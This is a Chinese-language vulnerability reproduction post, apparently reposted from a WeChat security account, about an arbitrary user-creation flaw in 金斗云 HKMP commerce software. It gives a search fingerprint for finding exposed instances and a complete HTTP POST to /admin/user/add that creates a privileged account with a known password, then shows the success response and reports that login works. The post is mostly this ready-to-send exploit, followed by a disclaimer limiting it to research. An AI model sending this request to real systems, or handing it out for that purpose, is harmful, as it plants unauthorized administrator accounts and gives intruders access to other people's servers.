资产收集
body="金斗云 Copyright"
漏洞复现
发送请求
POST /admin/user/add HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/json;charset=UTF-8X-Requested-With: XMLHttpRequestAccept: application/json, text/javascript, */*; q=0.01Accept-Encoding: gzip, deflate{"appId":"hkmp","mchId":"hkmp","deviceId":"hkmp","timestamp":1719305067,"nonce":5223015867,"sign":"hkmp","data":{"userCode":"root12346789","userName":"root12346789","password":"123456","privilege":["1000","8000","8010","2000","2001","2010","7000"],"adminUserCode":"admin","adminUserName":"系统管理员"}}
返回包
HTTP/1.1 200Content-Type: application/jsonDate: Mon, 08 Jul 2024 06:01:05 GMTContent-Length: 46{"code":"1000","message":"用户添加成功"}
添加的账号密码是
账号:root12346789密码:123456
可以进行成功登录
原文始发于微信公众号(Devil安全):【漏洞复现】金斗云 HKMP智慧商业软件 任意用户创建漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论